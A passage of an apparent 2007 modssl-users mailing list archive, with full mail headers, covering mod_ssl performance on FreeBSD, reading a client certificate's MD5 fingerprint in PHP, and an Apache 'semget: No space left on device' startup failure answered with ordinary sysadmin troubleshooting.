1.3.37 on a
dual Xeon 3.06, using a P4-3.2 as the client, and saw about 5000rps
for=A0HTTP, and 24=A0for HTTPS.=A0 I suspect that the latter may =
represent the
capabilities of my client machine rather than the server machine.
=A0
If you want fast SSL, you need hardware acceleration.=A0=20

________________________________________
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]
On Behalf Of Tim Lovelace
Sent: Sunday, March 25, 2007 7:54 AM
To: modssl-users@modssl.org
Subject: mod_ssl performance problems - FreeBSD
Hello,

I am having some issues with my SSL implementation on a FreeBSD =
6.2-RELEASE
system. I am currently running the following software

Server Version: Apache/1.3.37 (Unix) PHP/5.1.6 with Suhosin-Patch
mod_ssl/2.8.28 OpenSSL/0.9.7e-p1

All built from ports. In testing of the web application I noticed that =
once
SSL was added the initial login to the site was slowing down. I did some
testing using Apache Bench and have noticed that without SSL the server =
can
process about 700 requests per second. Using SSL the number is in the =
13-15
range. I have tried changing a few parameters (log level, SSLRandomSeed,
SSLSessionCache) and have seen 0 improvement. Using server_status shows =
that
there are plenty of resources available. Any help would be appreciated.


Tim

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl) www.modssl.org
User Support Mailing List modssl-users@modssl.org
Automated List Manager majordomo@modssl.org

 =20
________________________________________
TV dinner still cooling?
Check out "Tonight's Picks" on Yahoo! TV.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 29 12:50:07 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 29EA714D89D; Thu, 29 Mar 2007 12:50:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from v05176.home.net.pl (v05176.home.net.pl [212.85.116.96])
	by master.modssl.org (Postfix) with SMTP id 3D03814D82F
	for ; Thu, 29 Mar 2007 12:50:06 +0200 (CEST)
Received: from 80.249.6.42 (HELO ?192.168.1.50?) (aczarnecki.osanet@home@80.249.6.42)
  by m020.home.net.pl with SMTP; Thu, 29 Mar 2007 10:49:30 -0000
Message-ID: <460B99B9.2060504@osanet.pl>
Date: Thu, 29 Mar 2007 12:49:29 +0200
From: Albert Czarnecki 
User-Agent: Thunderbird 1.5.0.10 (X11/20070221)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: MD5 Fingerprint
X-Priority: 1 (Highest)
Content-Type: text/plain; charset=ISO-8859-2; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Albert Czarnecki 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi

I create certificate to my user, certificate name foo.p12 and I convert 
to foo.pem

In shell I get MD5 fingerprint from foo.pem like this command

openssl x509 -in usercert.pem -md5 -fingerprint -noout
MD5 Fingerprint=33:BC:00:BA:02:02:93:C0:C0:DC:96:D2:E7:00:9C:37

It's possible get this md5 fingerprint when user use this certificate in 
webrowser?

Serial I get  uses php script and modssl variables  
SSL_CLIENT_M_SERIAL,but I don't see variables about md5 fingerprint

;
?>


Albert
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 29 13:03:34 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5DF3A14D89D; Thu, 29 Mar 2007 13:03:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp-vbr14.xs4all.nl (smtp-vbr14.xs4all.nl [194.109.24.34])
	by master.modssl.org (Postfix) with ESMTP id 5A1D114D82F
	for ; Thu, 29 Mar 2007 13:03:32 +0200 (CEST)
Received: from [10.0.0.11] (futura.xs4all.nl [80.126.247.100])
	by smtp-vbr14.xs4all.nl (8.13.8/8.13.8) with ESMTP id l2TB2qCr043998
	for ; Thu, 29 Mar 2007 13:02:57 +0200 (CEST)
	(envelope-from jaap@futura.nl)
Mime-Version: 1.0 (Apple Message framework v624)
In-Reply-To: <460B99B9.2060504@osanet.pl>
References: <460B99B9.2060504@osanet.pl>
Content-Type: text/plain; charset=US-ASCII; format=flowed
Message-Id: <807ff1f58a037cbb2189d3fdb161938f@futura.nl>
Content-Transfer-Encoding: 7bit
From: jaap 
Subject: Re: MD5 Fingerprint
Date: Thu, 29 Mar 2007 13:02:52 +0200
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.624)
X-Virus-Scanned: by XS4ALL Virus Scanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jaap 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hey,

This is not really a mod_ssl, but more of a php question.

Maybe this will help?

http://nl2.php.net/manual/en/function.shell-exec.php

Met vriendelijke groet,
Jaap van Strien

Op 29-mrt-07 om 12:49 heeft Albert Czarnecki het volgende geschreven:

> Hi
>
> I create certificate to my user, certificate name foo.p12 and I 
> convert to foo.pem
>
> In shell I get MD5 fingerprint from foo.pem like this command
>
> openssl x509 -in usercert.pem -md5 -fingerprint -noout
> MD5 Fingerprint=33:BC:00:BA:02:02:93:C0:C0:DC:96:D2:E7:00:9C:37
>
> It's possible get this md5 fingerprint when user use this certificate 
> in webrowser?
>
> Serial I get  uses php script and modssl variables  
> SSL_CLIENT_M_SERIAL,but I don't see variables about md5 fingerprint
>
>  $c= $_SERVER["SSL_CLIENT_M_SERIAL"];
> echo "$c
;
> ?>
>
>
> Albert
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 29 13:17:35 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EC5BF14D89D; Thu, 29 Mar 2007 13:17:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from v05176.home.net.pl (v05176.home.net.pl [212.85.116.96])
	by master.modssl.org (Postfix) with SMTP id AC68A14D82F
	for ; Thu, 29 Mar 2007 13:17:32 +0200 (CEST)
Received: from 80.249.6.42 (HELO ?192.168.1.50?) (aczarnecki.osanet@home@80.249.6.42)
  by m020.home.net.pl with SMTP; Thu, 29 Mar 2007 11:16:56 -0000
Message-ID: <460BA026.60206@osanet.pl>
Date: Thu, 29 Mar 2007 13:16:54 +0200
From: Albert Czarnecki 
User-Agent: Thunderbird 1.5.0.10 (X11/20070221)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: MD5 Fingerprint
References: <460B99B9.2060504@osanet.pl> <807ff1f58a037cbb2189d3fdb161938f@futura.nl>
In-Reply-To: <807ff1f58a037cbb2189d3fdb161938f@futura.nl>
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Albert Czarnecki 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

jaap napisał(a):
> Hey,
>
> This is not really a mod_ssl, but more of a php question.
>
> Maybe this will help?
>
> http://nl2.php.net/manual/en/function.shell-exec.php
>
> Met vriendelijke groet,
> Jaap van Strien
>
> Op 29-mrt-07 om 12:49 heeft Albert Czarnecki het volgende geschreven:
Hm I want to use a ssl variable like SSL_CLIENT_M_SERIAL no php 
shell-exec funtion

It's possibly?

Albert

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 31 21:36:05 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5530614D86D; Sat, 31 Mar 2007 21:36:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.deluxnetwork.com (mail.deluxnetwork.com [203.206.139.222])
	by master.modssl.org (Postfix) with ESMTP id 435B514D841
	for ; Sat, 31 Mar 2007 21:36:04 +0200 (CEST)
Received: from zeus (unknown [192.168.0.34])
	by mail.deluxnetwork.com (Postfix) with ESMTP id 676256C6560
	for ; Sat, 31 Mar 2007 21:02:58 +1000 (EST)
From: "Ryan Forrester" 
To: 
Subject: Apache wont start with ssl
Date: Wed, 2 May 2007 05:35:06 +1000
Message-ID: <000601c78c27$d2da8d20$2200a8c0@zeus>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0007_01C78C7B.A4869D20"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ryan Forrester" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0007_01C78C7B.A4869D20
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

When attempting to start apache in SSL mode:
$ /home/servers/apache_1.3.37/bin/apachectl startssl
$ semget: No space left on device
 
Rebooting the machine allows me to start apache once more.. but after a
few 
days, apache wil fail and the same error occurs again, and the only way
to 
resolve is to reboot.
- Apache will start in mornal mode without a reboot.
 
error_log doesnt contain any useful information to help troubleshoot the

problem.

------=_NextPart_000_0007_01C78C7B.A4869D20
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable



















When attempting to start apache in SSL =
mode:
$ =
/home/servers/apache_1.3.37/bin/apachectl startssl
$ semget: No space left on =
device
 
Rebooting =
the machine allows me to start apache once more.. but after a few =

days, apache wil fail and the same error occurs again, and the =
only way to 
resolve is to =
reboot.
- Apache =
will start in mornal mode without a =
reboot.
 
error_log doesnt contain any useful information to help =
troubleshoot the 



problem.








------=_NextPart_000_0007_01C78C7B.A4869D20--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr  1 04:10:08 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 92E7D14D874; Sun,  1 Apr 2007 04:10:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail2.uen.org (mailgate.uen.org [205.127.225.225])
	by master.modssl.org (Postfix) with ESMTP id 905C714D846
	for ; Sun,  1 Apr 2007 04:10:05 +0200 (CEST)
Received: from mail2.uen.org (localhost.localdomain [127.0.0.1])
	by mail2.uen.org (Postfix) with SMTP id B420420D64
	for ; Sat, 31 Mar 2007 20:09:28 -0600 (MDT)
Received: by mail2.uen.org (Postfix, from userid 501)
	id 7126D20D69; Sat, 31 Mar 2007 20:09:28 -0600 (MDT)
X-Spam-Checker-Version: SpamAssassin 3.1.8 (2007-02-13) on mail2.uen.org
X-Spam-Level: 
X-Spam-Status: No, score=-101.2 required=3.5 tests=AWL,BAYES_00,
	USER_IN_WHITELIST autolearn=ham version=3.1.8
Received: from underminer2.uen.org (underminer2.uen.org [205.127.226.248])
	by mail2.uen.org (Postfix) with ESMTP id 9F5BF20D64
	for ; Sat, 31 Mar 2007 20:09:27 -0600 (MDT)
Received: from [192.168.1.100] (c-24-10-198-153.hsd1.ut.comcast.net [24.10.198.153])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by underminer2.uen.org (Postfix) with ESMTP id 4960433EBE3
	for ; Sat, 31 Mar 2007 20:09:27 -0600 (MDT)
Message-ID: <460F1450.4050304@uen.org>
Date: Sat, 31 Mar 2007 20:09:20 -0600
From: Andy Cravens 
User-Agent: Thunderbird 1.5.0.10 (Windows/20070221)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Apache wont start with ssl
References: <000601c78c27$d2da8d20$2200a8c0@zeus>
In-Reply-To: <000601c78c27$d2da8d20$2200a8c0@zeus>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Anti-Virus: Kaspersky Anti-Virus for MailServers 5.5.2/RELEASE, bases: 01042007 #273081, status: clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andy Cravens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Judging from the error message "No space left on device" sounds like 
some file system is full... maybe /tmp.  The next time this happens open 
a shell window and type:

df -k

Check the output to see if one of your file systems is full.  Look at 
/tmp and /swap specifically



Ryan Forrester wrote:
> When attempting to start apache in SSL mode:
> $ /home/servers/apache_1.3.37/bin/apachectl startssl
> $ semget: No space left on device
>  
> Rebooting the machine allows me to start apache once more.. but after a few 
> days, apache wil fail and the same error occurs again, and the only way to 
> resolve is to reboot.
> - Apache will start in mornal mode without a reboot.
>  
> error_log doesnt contain any useful information to help troubleshoot the 
>
> problem.
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr  1 07:10:55 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DE34B14D874; Sun,  1 Apr 2007 07:10:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rune.pobox.com (rune.pobox.com [208.210.124.79])
	by master.modssl.org (Postfix) with ESMTP id A0D0914D846
	for ; Sun,  1 Apr 2007 07:10:54 +0200 (CEST)
Received: from rune (localhost [127.0.0.1])
	by rune.pobox.com (Postfix) with ESMTP id 9B4D7CD363
	for ; Sun,  1 Apr 2007 01:10:39 -0400 (EDT)
Received: from [192.168.1.215] (unknown [69.55.70.22])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by rune.sasl.smtp.pobox.com (Postfix) with ESMTP id 751B7CD327
	for ; Sun,  1 Apr 2007 01:10:39 -0400 (EDT)
Message-ID: <460F3EB8.4020407@w3works.com>
Date: Sun, 01 Apr 2007 01:10:16 -0400
From: Dave Paris 
User-Agent: Thunderbird 1.5.0.10 (Macintosh/20070221)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache wont start with ssl
References: <000601c78c27$d2da8d20$2200a8c0@zeus> <460F1450.4050304@uen.org>
In-Reply-To: <460F1450.4050304@uen.org>
X-Enigmail-Version: 0.94.0.0
OpenPGP: id=74329DF4;
	url=hkp://wwwkeys.us.pgp.net
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Occasionally, /var/spool/clientmqueue can bite you as well.  The
filesystem will not show 100% used but you'll be out of inodes.  (If
that happens, you'll have loads of fun clearing it out ;-)

Good Luck!
- -dsp




Andy Cravens wrote:
> Judging from the error message "No space left on device" sounds like
> some file system is full... maybe /tmp.  The next time this happens open
> a shell window and type:
> 
> df -k
> 
> Check the output to see if one of your file systems is full.  Look at
> /tmp and /swap specifically
> 
> 
> 
> Ryan Forrester wrote:
>> When attempting to start apache in SSL mode:
>> $ /home/servers/apache_1.3.37/bin/apachectl startssl
>> $ semget: No space left on device
>>  
>> Rebooting the machine allows me to start apache once more.. but after
>> a few days, apache wil fail and the same error occurs again, and the
>> only way to resolve is to reboot.
>> - Apache will start in mornal mode without a reboot.
>>  
>> error_log doesnt contain any useful information to help troubleshoot the
>> problem.
>>
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFGDz62KmNPF3QynfQRAgjmAJ0XOdj2FH9O8oPRk9wD+IEEGgQHIwCfZmjc
+urX+xVcjjO+b/XjbsSfz6c=
=cMPQ
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr  1 12:01:52 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7F53A14D870; Sun,  1 Apr 2007 12:01:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.deluxnetwork.com (mail.deluxnetwork.com [203.206.139.222])
	by master.modssl.org (Postfix) with ESMTP id A685114D846
	for ; Sun,  1 Apr 2007 12:01:45 +0200 (CEST)
Received: from zeus (unknown [192.168.0.34])
	by mail.deluxnetwork.com (Postfix) with ESMTP id 782C76C6560
	for ; Sun,  1 Apr 2007 11:28:30 +1000 (EST)
From: "Ryan Forrester" 
To: 
Subject: RE: Apache wont start with ssl
Date: Wed, 2 May 2007 20:00:44 +1000
Message-ID: <000001c78ca0$c0d37cd0$2200a8c0@zeus>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
In-Reply-To: <460F3EB8.4020407@w3works.com>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ryan Forrester" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yeah, tried df -h prior to this thread.. def loads of space(at least
5g), will look into what dsp said.

Thanks guys.


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Dave Paris
Sent: Sunday, April 01, 2007 3:10 PM
To: modssl-users@modssl.org
Subject: Re: Apache wont start with ssl

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Occasionally, /var/spool/clientmqueue can bite you as well.  The
filesystem will not show 100% used but you'll be out of inodes.  (If
that happens, you'll have loads of fun clearing it out ;-)

Good Luck!
- -dsp




Andy Cravens wrote:
> Judging from the error message "No space left on device" sounds like
> some file system is full... maybe /tmp.  The next time this happens
open
> a shell window and type:
> 
> df -k
> 
> Check the output to see if one of your file systems is full.  Look at
> /tmp and /swap specifically
> 
> 
> 
> Ryan Forrester wrote:
>> When attempting to start apache in SSL mode:
>> $ /home/servers/apache_1.3.37/bin/apachectl startssl
>> $ semget: No space left on device
>>  
>> Rebooting the machine allows me to start apache once more.. but after
>> a few days, apache wil fail and the same error occurs again, and the
>> only way to resolve is to reboot.
>> - Apache will start in mornal mode without a reboot.
>>  
>> error_log doesnt contain any useful information to help troubleshoot
the
>> problem.
>>
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFGDz62KmNPF3QynfQRAgjmAJ0XOdj2FH9O8oPRk9wD+IEEGgQHIwCfZmjc
+urX+xVcjjO+b/XjbsSfz6c=
=cMPQ
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr  1 12:10:44 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B2AB514D870; Sun,  1 Apr 2007 12:10:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.deluxnetwork.com (mail.deluxnetwork.com [203.206.139.222])
	by master.modssl.org (Postfix) with ESMTP id 8C80614D846
	for ; Sun,  1 Apr 2007 12:10:43 +0200 (CEST)
Received: from zeus (unknown [192.168.0.34])
	by mail.deluxnetwork.com (Postfix) with ESMTP id EB75C6C6560
	for ; Sun,  1 Apr 2007 11:37:27 +1000 (EST)
From: "Ryan Forrester" 
To: 
Subject: RE: Apache wont start with ssl
Date: Wed, 2 May 2007 20:09:42 +1000
Message-ID: <000101c78ca2$013aa680$2200a8c0@zeus>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
In-Reply-To: <460F3EB8.4020407@w3works.com>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ryan Forrester" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Mqueue dir had only 5mb files in it.

[root@server15 ~]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
                       15G  5.0G  8.8G  36% /
/dev/ida/c0d0p1        99M   16M   78M  17% /boot
tmpfs                 569M     0  569M   0% /dev/shm



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Dave Paris
Sent: Sunday, April 01, 2007 3:10 PM
To: modssl-users@modssl.org
Subject: Re: Apache wont start with ssl

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Occasionally, /var/spool/clientmqueue can bite you as well.  The
filesystem will not show 100% used but you'll be out of inodes.  (If
that happens, you'll have loads of fun clearing it out ;-)

Good Luck!
- -dsp




Andy Cravens wrote:
> Judging from the error message "No space left on device" sounds like
> some file system is full... maybe /tmp.  The next time this happens
open
> a shell window and type:
> 
> df -k
> 
> Check the output to see if one of your file systems is full.  Look at
> /tmp and /swap specifically
> 
> 
> 
> Ryan Forrester wrote:
>> When attempting to start apache in SSL mode:
>> $ /home/servers/apache_1.3.37/bin/apachectl startssl
>> $ semget: No space left on device
>>  
>> Rebooting the machine allows me to start apache once more.. but after
>> a few days, apache wil fail and the same error occurs again, and the
>> only way to resolve is to reboot.
>> - Apache will start in mornal mode without a reboot.
>>  
>> error_log doesnt contain any useful information to help troubleshoot
the
>> problem.
>>
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFGDz62KmNPF3QynfQRAgjmAJ0XOdj2FH9O8oPRk9wD+IEEGgQHIwCfZmjc
+urX+xVcjjO+b/XjbsSfz6c=
=cMPQ
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr  1 13:02:59 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A837914D870; Sun,  1 Apr 2007 13:02:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.171])
	by master.modssl.org (Postfix) with ESMTP id 2280B14D846
	for ; Sun,  1 Apr 2007 13:02:58 +0200 (CEST)
Received: by ug-out-1314.google.com with SMTP id 80so1823545ugb
        for ; Sun, 01 Apr 2007 04:02:22 -0700 (PDT)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=OwIbtGw6qWmBAau/V0yWDWbCfFa606isljhEBnnquhFr15XMHheL7Y5nUTtEIXKZ24Z3XJ8kYMuGDXWygUghZW7oNalCM0FGLWxbr3z4E+JS0VlOBdfxk+K75mF+xvBj6N4dMDX3MNPFZW1SvtWp5x1TnBghQqLkF0/XEOZA1jE=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=SEFBJqrZkmnGCvociJavTfHT6cTzokZs0KIdcIwTYveob1xvXpIzGTnTn1BOIsE+ZKs8BkPYoxEDkrh2KCG8tb3kGh6vgIncb84f2PukW1zcry/eInKORz4l/ywWKd3DHelwCL8kXG2XaJRMggZCnyyWi6PmvdE9UquNRbWOvxI=
Received: by 10.67.116.3 with SMTP id t3mr2455696ugm.1175425342728;
        Sun, 01 Apr 2007 04:02:22 -0700 (PDT)
Received: by 10.67.34.19 with HTTP; Sun, 1 Apr 2007 04:02:22 -0700 (PDT)
Message-ID: <740f716a0704010402v74295817l5d13c8bfa2bdceb2@mail.gmail.com>
Date: Sun, 1 Apr 2007 04:02:22 -0700
From: "Yvo van Doorn" 
To: modssl-users@modssl.org
Subject: Re: Apache wont start with ssl
In-Reply-To: <000101c78ca2$013aa680$2200a8c0@zeus>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <460F3EB8.4020407@w3works.com>
	 <000101c78ca2$013aa680$2200a8c0@zeus>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yvo van Doorn" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sounds to me like sem files have gotten the best of you. Did you
compile Apache with mm? Try using ipcclean to clean up the semaphores.

Google for ipcclean, while its intentions and uses were meant  for
postgres, it basically removes the semaphores for any user (including
apache's user, what ever that may be on your server).

Btw this is more of an Apache related problem as opposed to mod_ssl
problem :-).



On 5/2/07, Ryan Forrester  wrote:
> Mqueue dir had only 5mb files in it.
>
> [root@server15 ~]# df -h
> Filesystem            Size  Used Avail Use% Mounted on
> /dev/mapper/VolGroup00-LogVol00
>                        15G  5.0G  8.8G  36% /
> /dev/ida/c0d0p1        99M   16M   78M  17% /boot
> tmpfs                 569M     0  569M   0% /dev/shm
>
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Dave Paris
> Sent: Sunday, April 01, 2007 3:10 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache wont start with ssl
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Occasionally, /var/spool/clientmqueue can bite you as well.  The
> filesystem will not show 100% used but you'll be out of inodes.  (If
> that happens, you'll have loads of fun clearing it out ;-)
>
> Good Luck!
> - -dsp
>
>
>
>
> Andy Cravens wrote:
> > Judging from the error message "No space left on device" sounds like
> > some file system is full... maybe /tmp.  The next time this happens
> open
> > a shell window and type:
> >
> > df -k
> >
> > Check the output to see if one of your file systems is full.  Look at
> > /tmp and /swap specifically
> >
> >
> >
> > Ryan Forrester wrote:
> >> When attempting to start apache in SSL mode:
> >> $ /home/servers/apache_1.3.37/bin/apachectl startssl
> >> $ semget: No space left on device
> >>
> >> Rebooting the machine allows me to start apache once more.. but after
> >> a few days, apache wil fail and the same error occurs again, and the
> >> only way to resolve is to reboot.
> >> - Apache will start in mornal mode without a reboot.
> >>
> >> error_log doesnt contain any useful information to help troubleshoot
> the
> >> problem.
> >>
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.1 (Darwin)
>
> iD8DBQFGDz62KmNPF3QynfQRAgjmAJ0XOdj2FH9O8oPRk9wD+IEEGgQHIwCfZmjc
> +urX+xVcjjO+b/XjbsSfz6c=
> =cMPQ
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
